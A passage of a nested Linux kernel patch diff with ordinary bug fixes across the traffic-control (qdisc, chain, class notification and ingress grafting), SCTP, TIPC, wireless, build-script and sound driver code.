+ 			cb->args[1] = 1;
+ 		}
+@@ -2658,7 +2669,8 @@ static int tc_chain_fill_node(const struct tcf_proto_ops *tmplt_ops,
+ 			      void *tmplt_priv, u32 chain_index,
+ 			      struct net *net, struct sk_buff *skb,
+ 			      struct tcf_block *block,
+-			      u32 portid, u32 seq, u16 flags, int event)
++			      u32 portid, u32 seq, u16 flags, int event,
++			      struct netlink_ext_ack *extack)
+ {
+ 	unsigned char *b = skb_tail_pointer(skb);
+ 	const struct tcf_proto_ops *ops;
+@@ -2695,7 +2707,12 @@ static int tc_chain_fill_node(const struct tcf_proto_ops *tmplt_ops,
+ 			goto nla_put_failure;
+ 	}
+ 
++	if (extack && extack->_msg &&
++	    nla_put_string(skb, TCA_EXT_WARN_MSG, extack->_msg))
++		goto out_nlmsg_trim;
++
+ 	nlh->nlmsg_len = skb_tail_pointer(skb) - b;
++
+ 	return skb->len;
+ 
+ out_nlmsg_trim:
+@@ -2705,7 +2722,8 @@ nla_put_failure:
+ }
+ 
+ static int tc_chain_notify(struct tcf_chain *chain, struct sk_buff *oskb,
+-			   u32 seq, u16 flags, int event, bool unicast)
++			   u32 seq, u16 flags, int event, bool unicast,
++			   struct netlink_ext_ack *extack)
+ {
+ 	u32 portid = oskb ? NETLINK_CB(oskb).portid : 0;
+ 	struct tcf_block *block = chain->block;
+@@ -2719,7 +2737,7 @@ static int tc_chain_notify(struct tcf_chain *chain, struct sk_buff *oskb,
+ 
+ 	if (tc_chain_fill_node(chain->tmplt_ops, chain->tmplt_priv,
+ 			       chain->index, net, skb, block, portid,
+-			       seq, flags, event) <= 0) {
++			       seq, flags, event, extack) <= 0) {
+ 		kfree_skb(skb);
+ 		return -EINVAL;
+ 	}
+@@ -2747,7 +2765,7 @@ static int tc_chain_notify_delete(const struct tcf_proto_ops *tmplt_ops,
+ 		return -ENOBUFS;
+ 
+ 	if (tc_chain_fill_node(tmplt_ops, tmplt_priv, chain_index, net, skb,
+-			       block, portid, seq, flags, RTM_DELCHAIN) <= 0) {
++			       block, portid, seq, flags, RTM_DELCHAIN, NULL) <= 0) {
+ 		kfree_skb(skb);
+ 		return -EINVAL;
+ 	}
+@@ -2900,11 +2918,11 @@ replay:
+ 		}
+ 
+ 		tc_chain_notify(chain, NULL, 0, NLM_F_CREATE | NLM_F_EXCL,
+-				RTM_NEWCHAIN, false);
++				RTM_NEWCHAIN, false, extack);
+ 		break;
+ 	case RTM_DELCHAIN:
+ 		tfilter_notify_chain(net, skb, block, q, parent, n,
+-				     chain, RTM_DELTFILTER);
++				     chain, RTM_DELTFILTER, extack);
+ 		/* Flush the chain first as the user requested chain removal. */
+ 		tcf_chain_flush(chain, true);
+ 		/* In case the chain was successfully deleted, put a reference
+@@ -2914,7 +2932,7 @@ replay:
+ 		break;
+ 	case RTM_GETCHAIN:
+ 		err = tc_chain_notify(chain, skb, n->nlmsg_seq,
+-				      n->nlmsg_flags, n->nlmsg_type, true);
++				      n->nlmsg_flags, n->nlmsg_type, true, extack);
+ 		if (err < 0)
+ 			NL_SET_ERR_MSG(extack, "Failed to send chain notify message");
+ 		break;
+@@ -3014,7 +3032,7 @@ static int tc_dump_chain(struct sk_buff *skb, struct netlink_callback *cb)
+ 					 chain->index, net, skb, block,
+ 					 NETLINK_CB(cb->skb).portid,
+ 					 cb->nlh->nlmsg_seq, NLM_F_MULTI,
+-					 RTM_NEWCHAIN);
++					 RTM_NEWCHAIN, NULL);
+ 		if (err <= 0)
+ 			break;
+ 		index++;
+diff --git a/net/sched/cls_u32.c b/net/sched/cls_u32.c
+index 34d25f7a0687a..a3477537c102b 100644
+--- a/net/sched/cls_u32.c
++++ b/net/sched/cls_u32.c
+@@ -716,13 +716,19 @@ static int u32_set_parms(struct net *net, struct tcf_proto *tp,
+ 			 struct nlattr *est, u32 flags, u32 fl_flags,
+ 			 struct netlink_ext_ack *extack)
+ {
+-	int err;
++	int err, ifindex = -1;
+ 
+ 	err = tcf_exts_validate_ex(net, tp, tb, est, &n->exts, flags,
+ 				   fl_flags, extack);
+ 	if (err < 0)
+ 		return err;
+ 
++	if (tb[TCA_U32_INDEV]) {
++		ifindex = tcf_change_indev(net, tb[TCA_U32_INDEV], extack);
++		if (ifindex < 0)
++			return -EINVAL;
++	}
++
+ 	if (tb[TCA_U32_LINK]) {
+ 		u32 handle = nla_get_u32(tb[TCA_U32_LINK]);
+ 		struct tc_u_hnode *ht_down = NULL, *ht_old;
+@@ -757,13 +763,9 @@ static int u32_set_parms(struct net *net, struct tcf_proto *tp,
+ 		tcf_bind_filter(tp, &n->res, base);
+ 	}
+ 
+-	if (tb[TCA_U32_INDEV]) {
+-		int ret;
+-		ret = tcf_change_indev(net, tb[TCA_U32_INDEV], extack);
+-		if (ret < 0)
+-			return -EINVAL;
+-		n->ifindex = ret;
+-	}
++	if (ifindex >= 0)
++		n->ifindex = ifindex;
++
+ 	return 0;
+ }
+ 
+diff --git a/net/sched/sch_api.c b/net/sched/sch_api.c
+index 6fb345ec22641..01d07e6a68119 100644
+--- a/net/sched/sch_api.c
++++ b/net/sched/sch_api.c
+@@ -907,7 +907,8 @@ static void qdisc_offload_graft_root(struct net_device *dev,
+ }
+ 
+ static int tc_fill_qdisc(struct sk_buff *skb, struct Qdisc *q, u32 clid,
+-			 u32 portid, u32 seq, u16 flags, int event)
++			 u32 portid, u32 seq, u16 flags, int event,
++			 struct netlink_ext_ack *extack)
+ {
+ 	struct gnet_stats_basic_sync __percpu *cpu_bstats = NULL;
+ 	struct gnet_stats_queue __percpu *cpu_qstats = NULL;
+@@ -975,7 +976,12 @@ static int tc_fill_qdisc(struct sk_buff *skb, struct Qdisc *q, u32 clid,
+ 	if (gnet_stats_finish_copy(&d) < 0)
+ 		goto nla_put_failure;
+ 
++	if (extack && extack->_msg &&
++	    nla_put_string(skb, TCA_EXT_WARN_MSG, extack->_msg))
++		goto out_nlmsg_trim;
++
+ 	nlh->nlmsg_len = skb_tail_pointer(skb) - b;
++
+ 	return skb->len;
+ 
+ out_nlmsg_trim:
+@@ -996,7 +1002,8 @@ static bool tc_qdisc_dump_ignore(struct Qdisc *q, bool dump_invisible)
+ 
+ static int qdisc_notify(struct net *net, struct sk_buff *oskb,
+ 			struct nlmsghdr *n, u32 clid,
+-			struct Qdisc *old, struct Qdisc *new)
++			struct Qdisc *old, struct Qdisc *new,
++			struct netlink_ext_ack *extack)
+ {
+ 	struct sk_buff *skb;
+ 	u32 portid = oskb ? NETLINK_CB(oskb).portid : 0;
+@@ -1007,12 +1014,12 @@ static int qdisc_notify(struct net *net, struct sk_buff *oskb,
+ 
+ 	if (old && !tc_qdisc_dump_ignore(old, false)) {
+ 		if (tc_fill_qdisc(skb, old, clid, portid, n->nlmsg_seq,
+-				  0, RTM_DELQDISC) < 0)
++				  0, RTM_DELQDISC, extack) < 0)
+ 			goto err_out;
+ 	}
+ 	if (new && !tc_qdisc_dump_ignore(new, false)) {
+ 		if (tc_fill_qdisc(skb, new, clid, portid, n->nlmsg_seq,
+-				  old ? NLM_F_REPLACE : 0, RTM_NEWQDISC) < 0)
++				  old ? NLM_F_REPLACE : 0, RTM_NEWQDISC, extack) < 0)
+ 			goto err_out;
+ 	}
+ 
+@@ -1027,10 +1034,11 @@ err_out:
+ 
+ static void notify_and_destroy(struct net *net, struct sk_buff *skb,
+ 			       struct nlmsghdr *n, u32 clid,
+-			       struct Qdisc *old, struct Qdisc *new)
++			       struct Qdisc *old, struct Qdisc *new,
++			       struct netlink_ext_ack *extack)
+ {
+ 	if (new || old)
+-		qdisc_notify(net, skb, n, clid, old, new);
++		qdisc_notify(net, skb, n, clid, old, new, extack);
+ 
+ 	if (old)
+ 		qdisc_put(old);
+@@ -1068,17 +1076,29 @@ static int qdisc_graft(struct net_device *dev, struct Qdisc *parent,
+ 
+ 	if (parent == NULL) {
+ 		unsigned int i, num_q, ingress;
++		struct netdev_queue *dev_queue;
+ 
+ 		ingress = 0;
+ 		num_q = dev->num_tx_queues;
+ 		if ((q && q->flags & TCQ_F_INGRESS) ||
+ 		    (new && new->flags & TCQ_F_INGRESS)) {
+-			num_q = 1;
+ 			ingress = 1;
+-			if (!dev_ingress_queue(dev)) {
++			dev_queue = dev_ingress_queue(dev);
++			if (!dev_queue) {
+ 				NL_SET_ERR_MSG(extack, "Device does not have an ingress queue");
+ 				return -ENOENT;
+ 			}
++
++			q = rtnl_dereference(dev_queue->qdisc_sleeping);
++
++			/* This is the counterpart of that qdisc_refcount_inc_nz() call in
++			 * __tcf_qdisc_find() for filter requests.
++			 */
++			if (!qdisc_refcount_dec_if_one(q)) {
++				NL_SET_ERR_MSG(extack,
++					       "Current ingress or clsact Qdisc has ongoing filter requests");
++				return -EBUSY;
++			}
+ 		}
+ 
+ 		if (dev->flags & IFF_UP)
+@@ -1089,18 +1109,26 @@ static int qdisc_graft(struct net_device *dev, struct Qdisc *parent,
+ 		if (new && new->ops->attach && !ingress)
+ 			goto skip;
+ 
+-		for (i = 0; i < num_q; i++) {
+-			struct netdev_queue *dev_queue = dev_ingress_queue(dev);
+-
+-			if (!ingress)
++		if (!ingress) {
++			for (i = 0; i < num_q; i++) {
+ 				dev_queue = netdev_get_tx_queue(dev, i);
++				old = dev_graft_qdisc(dev_queue, new);
+ 
+-			old = dev_graft_qdisc(dev_queue, new);
+-			if (new && i > 0)
+-				qdisc_refcount_inc(new);
+-
+-			if (!ingress)
++				if (new && i > 0)
++					qdisc_refcount_inc(new);
+ 				qdisc_put(old);
++			}
++		} else {
++			old = dev_graft_qdisc(dev_queue, NULL);
++
++			/* {ingress,clsact}_destroy() @old before grafting @new to avoid
++			 * unprotected concurrent accesses to net_device::miniq_{in,e}gress
++			 * pointer(s) in mini_qdisc_pair_swap().
++			 */
++			qdisc_notify(net, skb, n, classid, old, new, extack);
++			qdisc_destroy(old);
++
++			dev_graft_qdisc(dev_queue, new);
+ 		}
+ 
+ skip:
+@@ -1110,12 +1138,10 @@ skip:
+ 				qdisc_refcount_inc(new);
+ 			rcu_assign_pointer(dev->qdisc, new ? : &noop_qdisc);
+ 
+-			notify_and_destroy(net, skb, n, classid, old, new);
++			notify_and_destroy(net, skb, n, classid, old, new, extack);
+ 
+ 			if (new && new->ops->attach)
+ 				new->ops->attach(new);
+-		} else {
+-			notify_and_destroy(net, skb, n, classid, old, new);
+ 		}
+ 
+ 		if (dev->flags & IFF_UP)
+@@ -1146,7 +1172,7 @@ skip:
+ 		err = cops->graft(parent, cl, new, &old, extack);
+ 		if (err)
+ 			return err;
+-		notify_and_destroy(net, skb, n, classid, old, new);
++		notify_and_destroy(net, skb, n, classid, old, new, extack);
+ 	}
+ 	return 0;
+ }
+@@ -1519,7 +1545,7 @@ static int tc_get_qdisc(struct sk_buff *skb, struct nlmsghdr *n,
+ 		if (err != 0)
+ 			return err;
+ 	} else {
+-		qdisc_notify(net, skb, n, clid, NULL, q);
++		qdisc_notify(net, skb, n, clid, NULL, q, NULL);
+ 	}
+ 	return 0;
+ }
+@@ -1667,7 +1693,7 @@ replay:
+ 	}
+ 	err = qdisc_change(q, tca, extack);
+ 	if (err == 0)
+-		qdisc_notify(net, skb, n, clid, NULL, q);
++		qdisc_notify(net, skb, n, clid, NULL, q, extack);
+ 	return err;
+ 
+ create_n_graft:
+@@ -1734,7 +1760,7 @@ static int tc_dump_qdisc_root(struct Qdisc *root, struct sk_buff *skb,
+ 		if (!tc_qdisc_dump_ignore(q, dump_invisible) &&
+ 		    tc_fill_qdisc(skb, q, q->parent, NETLINK_CB(cb->skb).portid,
+ 				  cb->nlh->nlmsg_seq, NLM_F_MULTI,
+-				  RTM_NEWQDISC) <= 0)
++				  RTM_NEWQDISC, NULL) <= 0)
+ 			goto done;
+ 		q_idx++;
+ 	}
+@@ -1756,7 +1782,7 @@ static int tc_dump_qdisc_root(struct Qdisc *root, struct sk_buff *skb,
+ 		if (!tc_qdisc_dump_ignore(q, dump_invisible) &&
+ 		    tc_fill_qdisc(skb, q, q->parent, NETLINK_CB(cb->skb).portid,
+ 				  cb->nlh->nlmsg_seq, NLM_F_MULTI,
+-				  RTM_NEWQDISC) <= 0)
++				  RTM_NEWQDISC, NULL) <= 0)
+ 			goto done;
+ 		q_idx++;
+ 	}
+@@ -1829,8 +1855,8 @@ done:
+  ************************************************/
+ 
+ static int tc_fill_tclass(struct sk_buff *skb, struct Qdisc *q,
+-			  unsigned long cl,
+-			  u32 portid, u32 seq, u16 flags, int event)
++			  unsigned long cl, u32 portid, u32 seq, u16 flags,
++			  int event, struct netlink_ext_ack *extack)
+ {
+ 	struct tcmsg *tcm;
+ 	struct nlmsghdr  *nlh;
+@@ -1865,7 +1891,12 @@ static int tc_fill_tclass(struct sk_buff *skb, struct Qdisc *q,
+ 	if (gnet_stats_finish_copy(&d) < 0)
+ 		goto nla_put_failure;
+ 
++	if (extack && extack->_msg &&
++	    nla_put_string(skb, TCA_EXT_WARN_MSG, extack->_msg))
++		goto out_nlmsg_trim;
++
+ 	nlh->nlmsg_len = skb_tail_pointer(skb) - b;
++
+ 	return skb->len;
+ 
+ out_nlmsg_trim:
+@@ -1876,7 +1907,7 @@ nla_put_failure:
+ 
+ static int tclass_notify(struct net *net, struct sk_buff *oskb,
+ 			 struct nlmsghdr *n, struct Qdisc *q,
+-			 unsigned long cl, int event)
++			 unsigned long cl, int event, struct netlink_ext_ack *extack)
+ {
+ 	struct sk_buff *skb;
+ 	u32 portid = oskb ? NETLINK_CB(oskb).portid : 0;
+@@ -1885,7 +1916,7 @@ static int tclass_notify(struct net *net, struct sk_buff *oskb,
+ 	if (!skb)
+ 		return -ENOBUFS;
+ 
+-	if (tc_fill_tclass(skb, q, cl, portid, n->nlmsg_seq, 0, event) < 0) {
++	if (tc_fill_tclass(skb, q, cl, portid, n->nlmsg_seq, 0, event, extack) < 0) {
+ 		kfree_skb(skb);
+ 		return -EINVAL;
+ 	}
+@@ -1912,7 +1943,7 @@ static int tclass_del_notify(struct net *net,
+ 		return -ENOBUFS;
+ 
+ 	if (tc_fill_tclass(skb, q, cl, portid, n->nlmsg_seq, 0,
+-			   RTM_DELTCLASS) < 0) {
++			   RTM_DELTCLASS, extack) < 0) {
+ 		kfree_skb(skb);
+ 		return -EINVAL;
+ 	}
+@@ -2119,7 +2150,7 @@ static int tc_ctl_tclass(struct sk_buff *skb, struct nlmsghdr *n,
+ 			tc_bind_tclass(q, portid, clid, 0);
+ 			goto out;
+ 		case RTM_GETTCLASS:
+-			err = tclass_notify(net, skb, n, q, cl, RTM_NEWTCLASS);
++			err = tclass_notify(net, skb, n, q, cl, RTM_NEWTCLASS, extack);
+ 			goto out;
+ 		default:
+ 			err = -EINVAL;
+@@ -2137,7 +2168,7 @@ static int tc_ctl_tclass(struct sk_buff *skb, struct nlmsghdr *n,
+ 	if (cops->change)
+ 		err = cops->change(q, clid, portid, tca, &new_cl, extack);
+ 	if (err == 0) {
+-		tclass_notify(net, skb, n, q, new_cl, RTM_NEWTCLASS);
++		tclass_notify(net, skb, n, q, new_cl, RTM_NEWTCLASS, extack);
+ 		/* We just create a new class, need to do reverse binding. */
+ 		if (cl != new_cl)
+ 			tc_bind_tclass(q, portid, clid, new_cl);
+@@ -2159,7 +2190,7 @@ static int qdisc_class_dump(struct Qdisc *q, unsigned long cl,
+ 
+ 	return tc_fill_tclass(a->skb, q, cl, NETLINK_CB(a->cb->skb).portid,
+ 			      a->cb->nlh->nlmsg_seq, NLM_F_MULTI,
+-			      RTM_NEWTCLASS);
++			      RTM_NEWTCLASS, NULL);
+ }
+ 
+ static int tc_dump_tclass_qdisc(struct Qdisc *q, struct sk_buff *skb,
+diff --git a/net/sched/sch_generic.c b/net/sched/sch_generic.c
+index ee43e8ac039ed..a5693e25b2482 100644
+--- a/net/sched/sch_generic.c
++++ b/net/sched/sch_generic.c
+@@ -1046,7 +1046,7 @@ static void qdisc_free_cb(struct rcu_head *head)
+ 	qdisc_free(q);
+ }
+ 
+-static void qdisc_destroy(struct Qdisc *qdisc)
++static void __qdisc_destroy(struct Qdisc *qdisc)
+ {
+ 	const struct Qdisc_ops  *ops = qdisc->ops;
+ 
+@@ -1070,6 +1070,14 @@ static void qdisc_destroy(struct Qdisc *qdisc)
+ 	call_rcu(&qdisc->rcu, qdisc_free_cb);
+ }
+ 
++void qdisc_destroy(struct Qdisc *qdisc)
++{
++	if (qdisc->flags & TCQ_F_BUILTIN)
++		return;
++
++	__qdisc_destroy(qdisc);
++}
++
+ void qdisc_put(struct Qdisc *qdisc)
+ {
+ 	if (!qdisc)
+@@ -1079,7 +1087,7 @@ void qdisc_put(struct Qdisc *qdisc)
+ 	    !refcount_dec_and_test(&qdisc->refcnt))
+ 		return;
+ 
+-	qdisc_destroy(qdisc);
++	__qdisc_destroy(qdisc);
+ }
+ EXPORT_SYMBOL(qdisc_put);
+ 
+@@ -1094,7 +1102,7 @@ void qdisc_put_unlocked(struct Qdisc *qdisc)
+ 	    !refcount_dec_and_rtnl_lock(&qdisc->refcnt))
+ 		return;
+ 
+-	qdisc_destroy(qdisc);
++	__qdisc_destroy(qdisc);
+ 	rtnl_unlock();
+ }
+ EXPORT_SYMBOL(qdisc_put_unlocked);
+diff --git a/net/sctp/sm_statefuns.c b/net/sctp/sm_statefuns.c
+index f6ee7f4040c14..5383b6a9da61c 100644
+--- a/net/sctp/sm_statefuns.c
++++ b/net/sctp/sm_statefuns.c
+@@ -4484,7 +4484,7 @@ enum sctp_disposition sctp_sf_eat_auth(struct net *net,
+ 				    SCTP_AUTH_NEW_KEY, GFP_ATOMIC);
+ 
+ 		if (!ev)
+-			return -ENOMEM;
++			return SCTP_DISPOSITION_NOMEM;
+ 
+ 		sctp_add_cmd_sf(commands, SCTP_CMD_EVENT_ULP,
+ 				SCTP_ULPEVENT(ev));
+diff --git a/net/tipc/bearer.c b/net/tipc/bearer.c
+index 53881406e2006..cdcd2731860ba 100644
+--- a/net/tipc/bearer.c
++++ b/net/tipc/bearer.c
+@@ -1258,7 +1258,7 @@ int tipc_nl_media_get(struct sk_buff *skb, struct genl_info *info)
+ 	struct tipc_nl_msg msg;
+ 	struct tipc_media *media;
+ 	struct sk_buff *rep;
+-	struct nlattr *attrs[TIPC_NLA_BEARER_MAX + 1];
++	struct nlattr *attrs[TIPC_NLA_MEDIA_MAX + 1];
+ 
+ 	if (!info->attrs[TIPC_NLA_MEDIA])
+ 		return -EINVAL;
+@@ -1307,7 +1307,7 @@ int __tipc_nl_media_set(struct sk_buff *skb, struct genl_info *info)
+ 	int err;
+ 	char *name;
+ 	struct tipc_media *m;
+-	struct nlattr *attrs[TIPC_NLA_BEARER_MAX + 1];
++	struct nlattr *attrs[TIPC_NLA_MEDIA_MAX + 1];
+ 
+ 	if (!info->attrs[TIPC_NLA_MEDIA])
+ 		return -EINVAL;
+diff --git a/net/wireless/rdev-ops.h b/net/wireless/rdev-ops.h
+index 13b209a8db287..ee853a14a02de 100644
+--- a/net/wireless/rdev-ops.h
++++ b/net/wireless/rdev-ops.h
+@@ -2,7 +2,7 @@
+ /*
+  * Portions of this file
+  * Copyright(c) 2016-2017 Intel Deutschland GmbH
+- * Copyright (C) 2018, 2021-2022 Intel Corporation
++ * Copyright (C) 2018, 2021-2023 Intel Corporation
+  */
+ #ifndef __CFG80211_RDEV_OPS
+ #define __CFG80211_RDEV_OPS
+@@ -1441,8 +1441,8 @@ rdev_del_intf_link(struct cfg80211_registered_device *rdev,
+ 		   unsigned int link_id)
+ {
+ 	trace_rdev_del_intf_link(&rdev->wiphy, wdev, link_id);
+-	if (rdev->ops->add_intf_link)
+-		rdev->ops->add_intf_link(&rdev->wiphy, wdev, link_id);
++	if (rdev->ops->del_intf_link)
++		rdev->ops->del_intf_link(&rdev->wiphy, wdev, link_id);
+ 	trace_rdev_return_void(&rdev->wiphy);
+ }
+ 
+diff --git a/net/wireless/reg.c b/net/wireless/reg.c
+index 4f3f31244e8ba..522180919a1a3 100644
+--- a/net/wireless/reg.c
++++ b/net/wireless/reg.c
+@@ -2442,11 +2442,8 @@ static bool reg_wdev_chan_valid(struct wiphy *wiphy, struct wireless_dev *wdev)
+ 		case NL80211_IFTYPE_P2P_GO:
+ 		case NL80211_IFTYPE_ADHOC:
+ 		case NL80211_IFTYPE_MESH_POINT:
+-			wiphy_lock(wiphy);
+ 			ret = cfg80211_reg_can_beacon_relax(wiphy, &chandef,
+ 							    iftype);
+-			wiphy_unlock(wiphy);
+-
+ 			if (!ret)
+ 				return ret;
+ 			break;
+@@ -2478,11 +2475,11 @@ static void reg_leave_invalid_chans(struct wiphy *wiphy)
+ 	struct wireless_dev *wdev;
+ 	struct cfg80211_registered_device *rdev = wiphy_to_rdev(wiphy);
+ 
+-	ASSERT_RTNL();
+-
++	wiphy_lock(wiphy);
+ 	list_for_each_entry(wdev, &rdev->wiphy.wdev_list, list)
+ 		if (!reg_wdev_chan_valid(wiphy, wdev))
+ 			cfg80211_leave(rdev, wdev);
++	wiphy_unlock(wiphy);
+ }
+ 
+ static void reg_check_chans_work(struct work_struct *work)
+diff --git a/scripts/Kconfig.include b/scripts/Kconfig.include
+index 274125307ebd7..5a84b6443875c 100644
+--- a/scripts/Kconfig.include
++++ b/scripts/Kconfig.include
+@@ -33,7 +33,7 @@ ld-option = $(success,$(LD) -v $(1))
+ 
+ # $(as-instr,<instr>)
+ # Return y if the assembler supports <instr>, n otherwise
+-as-instr = $(success,printf "%b\n" "$(1)" | $(CC) $(CLANG_FLAGS) -c -x assembler -o /dev/null -)
++as-instr = $(success,printf "%b\n" "$(1)" | $(CC) $(CLANG_FLAGS) -c -x assembler-with-cpp -o /dev/null -)
+ 
+ # check if $(CC) and $(LD) exist
+ $(error-if,$(failure,command -v $(CC)),C compiler '$(CC)' not found)
+diff --git a/scripts/Makefile.compiler b/scripts/Makefile.compiler
+index 20d353dcabfbc..158c57f2acfde 100644
+--- a/scripts/Makefile.compiler
++++ b/scripts/Makefile.compiler
+@@ -29,16 +29,16 @@ try-run = $(shell set -e;		\
+ 	fi)
+ 
+ # as-option
+-# Usage: cflags-y += $(call as-option,-Wa$(comma)-isa=foo,)
++# Usage: aflags-y += $(call as-option,-Wa$(comma)-isa=foo,)
+ 
+ as-option = $(call try-run,\
+-	$(CC) $(KBUILD_CFLAGS) $(1) -c -x assembler /dev/null -o "$$TMP",$(1),$(2))
++	$(CC) -Werror $(KBUILD_AFLAGS) $(1) -c -x assembler-with-cpp /dev/null -o "$$TMP",$(1),$(2))
+ 
+ # as-instr
+-# Usage: cflags-y += $(call as-instr,instr,option1,option2)
++# Usage: aflags-y += $(call as-instr,instr,option1,option2)
+ 
+ as-instr = $(call try-run,\
+-	printf "%b\n" "$(1)" | $(CC) $(KBUILD_AFLAGS) -c -x assembler -o "$$TMP" -,$(2),$(3))
++	printf "%b\n" "$(1)" | $(CC) -Werror $(KBUILD_AFLAGS) -c -x assembler-with-cpp -o "$$TMP" -,$(2),$(3))
+ 
+ # __cc-option
+ # Usage: MY_CFLAGS += $(call __cc-option,$(CC),$(MY_CFLAGS),-march=winchip-c6,-march=i586)
+diff --git a/scripts/as-version.sh b/scripts/as-version.sh
+index 1a21495e9ff05..af717476152d1 100755
+--- a/scripts/as-version.sh
++++ b/scripts/as-version.sh
+@@ -45,7 +45,7 @@ orig_args="$@"
+ # Get the first line of the --version output.
+ IFS='
+ '
+-set -- $(LC_ALL=C "$@" -Wa,--version -c -x assembler /dev/null -o /dev/null 2>/dev/null)
++set -- $(LC_ALL=C "$@" -Wa,--version -c -x assembler-with-cpp /dev/null -o /dev/null 2>/dev/null)
+ 
+ # Split the line on spaces.
+ IFS=' '
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 48a0e87136f1c..920e44ba998a5 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -11738,6 +11738,7 @@ static const struct snd_pci_quirk alc662_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1b0a, 0x01b8, "ACER Veriton", ALC662_FIXUP_ACER_VERITON),
+ 	SND_PCI_QUIRK(0x1b35, 0x1234, "CZC ET26", ALC662_FIXUP_CZC_ET26),
+ 	SND_PCI_QUIRK(0x1b35, 0x2206, "CZC P10T", ALC662_FIXUP_CZC_P10T),
++	SND_PCI_QUIRK(0x1c6c, 0x1239, "Compaq N14JP6-V2", ALC897_FIXUP_HP_HSMIC_VERB),
+ 
+ #if 0
+ 	/* Below is a quirk table taken from the old code.
+diff --git a/sound/soc/codecs/cs35l41-lib.c b/sound/soc/codecs/cs35l41-lib.c
+index 04be71435491e..c2c56e5608094 100644
+--- a/sound/soc/codecs/cs35l41-lib.c
++++ b/sound/soc/codecs/cs35l41-lib.c
+@@ -46,7 +46,7 @@ static const struct reg_default cs35l41_reg[] = {
+ 	{ CS35L41_DSP1_RX5_SRC,			0x00000020 },
+ 	{ CS35L41_DSP1_RX6_SRC,			0x00000021 },
+ 	{ CS35L41_DSP1_RX7_SRC,			0x0000003A },
+-	{ CS35L41_DSP1_RX8_SRC,			0x00000001 },
++	{ CS35L41_DSP1_RX8_SRC,			0x0000003B },
+ 	{ CS35L41_NGATE1_SRC,			0x00000008 },
+ 	{ CS35L41_NGATE2_SRC,			0x00000009 },
+ 	{ CS35L41_AMP_DIG_VOL_CTRL,		0x00008000 },
+@@ -58,8 +58,8 @@ static const struct reg_default cs35l41_reg[] = {
+ 	{ CS35L41_IRQ1_MASK2,			0xFFFFFFFF },
+ 	{ CS35L41_IRQ1_MASK3,			0xFFFF87FF },
+ 	{ CS35L41_IRQ1_MASK4,			0xFEFFFFFF },
+-	{ CS35L41_GPIO1_CTRL1,			0xE1000001 },
+-	{ CS35L41_GPIO2_CTRL1,			0xE1000001 },
++	{ CS35L41_GPIO1_CTRL1,			0x81000001 },
++	{ CS35L41_GPIO2_CTRL1,			0x81000001 },
+ 	{ CS35L41_MIXER_NGATE_CFG,		0x00000000 },
+ 	{ CS35L41_MIXER_NGATE_CH1_CFG,		0x00000303 },
+ 	{ CS35L41_MIXER_NGATE_CH2_CFG,		0x00000303 },
+diff --git a/sound/soc/dwc/dwc-i2s.c b/sound/soc/dwc/dwc-i2s.c
+index 3496301582b22..f966d39c5c907 100644
+--- a/sound/soc/dwc/dwc-i2s.c
++++ b/sound/soc/dwc/dwc-i2s.c
+@@ -183,30 +183,6 @@ static void i2s_stop(struct dw_i2s_dev *dev,
+ 	}
+ }
+ 
+-static int dw_i2s_startup(struct snd_pcm_substream *substream,
+-		struct snd_soc_dai *cpu_dai)
+-{
+-	struct dw_i2s_dev *dev = snd_soc_dai_get_drvdata(cpu_dai);
+-	union dw_i2s_snd_dma_data *dma_data = NULL;
+-
+-	if (!(dev->capability & DWC_I2S_RECORD) &&
+-			(substream->stream == SNDRV_PCM_STREAM_CAPTURE))
+-		return -EINVAL;
+-
+-	if (!(dev->capability & DWC_I2S_PLAY) &&
+-			(substream->stream == SNDRV_PCM_STREAM_PLAYBACK))
+-		return -EINVAL;
+-
+-	if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK)
+-		dma_data = &dev->play_dma_data;
+-	else if (substream->stream == SNDRV_PCM_STREAM_CAPTURE)
+-		dma_data = &dev->capture_dma_data;
+-
+-	snd_soc_dai_set_dma_data(cpu_dai, substream, (void *)dma_data);
+-
+-	return 0;
+-}
+-
+ static void dw_i2s_config(struct dw_i2s_dev *dev, int stream)
+ {
+ 	u32 ch_reg;
+@@ -305,12 +281,6 @@ static int dw_i2s_hw_params(struct snd_pcm_substream *substream,
+ 	return 0;
+ }
+ 
+-static void dw_i2s_shutdown(struct snd_pcm_substream *substream,
+-		struct snd_soc_dai *dai)
+-{
+-	snd_soc_dai_set_dma_data(dai, substream, NULL);
+-}
+-
+ static int dw_i2s_prepare(struct snd_pcm_substream *substream,
+ 			  struct snd_soc_dai *dai)
+ {
+@@ -382,8 +352,6 @@ static int dw_i2s_set_fmt(struct snd_soc_dai *cpu_dai, unsigned int fmt)
+ }
+ 
+ static const struct snd_soc_dai_ops dw_i2s_dai_ops = {
+-	.startup	= dw_i2s_startup,
+-	.shutdown	= dw_i2s_shutdown,
+ 	.hw_params	= dw_i2s_hw_params,
+ 	.prepare	= dw_i2s_prepare,
+ 	.trigger	= dw_i2s_trigger,
+@@ -625,6 +593,14 @@ static int dw_configure_dai_by_dt(struct dw_i2s_dev *dev,
+ 
+ }
+ 
++static int dw_i2s_dai_probe(struct snd_soc_dai *dai)
++{
++	struct dw_i2s_dev *dev = snd_soc_dai_get_drvdata(dai);
++
++	snd_soc_dai_init_dma_data(dai, &dev->play_dma_data, &dev->capture_dma_data);
++	return 0;
++}
++
+ static int dw_i2s_probe(struct platform_device *pdev)
+ {
+ 	const struct i2s_platform_data *pdata = pdev->dev.platform_data;
+@@ -643,6 +619,7 @@ static int dw_i2s_probe(struct platform_device *pdev)
+ 		return -ENOMEM;
+ 
+ 	dw_i2s_dai->ops = &dw_i2s_dai_ops;
++	dw_i2s_dai->probe = dw_i2s_dai_probe;
+ 
+ 	dev->i2s_base = devm_platform_get_and_ioremap_resource(pdev, 0, &res);
+ 	if (IS_ERR(dev->i2s_base))
+diff --git a/sound/soc/intel/avs/board_selection.c b/sound/soc/intel/avs/board_selection.c
+index 87f9c18be238d..87353b4b0cd73 100644
+--- a/sound/soc/intel/avs/board_selection.c
++++ b/sound/soc/intel/avs/board_selection.c
+@@ -394,7 +394,7 @@ static int avs_register_i2s_boards(struct avs_dev *adev)
+ 	}
+ 
+ 	for (mach = boards->machs; mach->id[0]; mach++) {
+-		if (!acpi_dev_present(mach->id, NULL, -1))
++		if (!acpi_dev_present(mach->id, mach->uid, -1))
+ 			continue;
+ 
+ 		if (mach->machine_quirk)
